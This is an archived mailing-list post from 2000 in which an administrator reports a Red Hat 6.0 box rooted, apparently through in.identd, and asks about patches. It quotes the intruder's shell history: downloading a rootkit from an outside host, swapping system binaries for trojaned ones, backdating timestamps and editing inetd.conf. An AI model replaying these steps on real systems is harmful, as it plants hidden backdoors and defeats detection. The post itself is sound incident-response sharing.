Security Incidents mailing list archives
Rooted through in.identd on Red Hat 6.0
From: del () BABEL COM AU (Del Elson)
Date: Wed, 19 Apr 2000 05:02:13 -0000
Hi, A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently. The hacker left the usual trace in /.bash_history, which ran like: mkdir /usr/lib/... ; cd /usr/lib/... ftp 200.192.58.201 21 cd /usr/lib/... mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz gzip -d * chmod +x * mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07 echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221; touch -t 199910122110 /dev/cui220 touch -t 199910122110 /dev/cui221 touch -t 199910122110 /usr/lib/pt07 touch -t 199910122110 /usr/sbin/syslogd touch -t 199910122110 /usr/sbin/tcpd touch -t 199910122110 /bin/ps touch -t 199910122110 /bin/netstat touch -t 199910122110 /usr/bin/pstree cat /etc/inetd.conf | grep -v 15678 >> /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd ... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were: Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201 Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 ... the IP address traces back to somewhere in Brazil. Anyone know of any current bug notices, exploits, or patches for in.identd? Del
Current thread:
- Re: CGI scans from Strauss.udel.edu -- They're back, (continued)
- Re: CGI scans from Strauss.udel.edu -- They're back Tom Perrine (Apr 15)
- Re: CGI scans from Strauss.udel.edu -- They're back Matthew S. Hallacy (Apr 16)
- Re: CGI scans from Strauss.udel.edu -- They're back Omachonu Ogali (Apr 18)
- Rapid Web page harvesting, probably by marketing firm Brett Glass (Apr 18)
- Frontpage Exploits Keith McCammon (Apr 19)
- Re: CGI scans from Strauss.udel.edu -- They're back Elliot L. Tobin (Apr 17)
- Re: CGI scans from Strauss.udel.edu -- They're back Dragos Ruiu (Apr 17)
- Re: CGI scans from Strauss.udel.edu -- They're back Ryan Russell (Apr 18)
- Re: CGI scans from Strauss.udel.edu -- They're back Bryan Seitz (Apr 19)
- Re: CGI scans from Strauss.udel.edu -- They're back Marcelo Magnasco (Apr 18)
- Rooted through in.identd on Red Hat 6.0 Del Elson (Apr 18)
- Re: Rooted through in.identd on Red Hat 6.0 Sebastian (Apr 20)
- Re: Rooted through in.identd on Red Hat 6.0 Dmitry Alyabyev (Apr 20)
- RH6.1/IPChains box hacked J. J. Horner (Apr 20)
- Re: RH6.1/IPChains box hacked Jon Lewis (Apr 21)
- Re: RH6.1/IPChains box hacked mad () STUDENTS ZCU CZ (Apr 21)
- Re: RH6.1/IPChains box hacked Del Elson (Apr 24)
- Re: Rooted through in.identd on Red Hat 6.0 Cold Fire (Apr 20)
- Re: Rooted through in.identd on Red Hat 6.0 Jose Nazario (Apr 21)
- Re: Rooted through in.identd on Red Hat 6.0 Richard Wash (Apr 20)
- Re: Rooted through in.identd on Red Hat 6.0 J. J. Horner (Apr 20)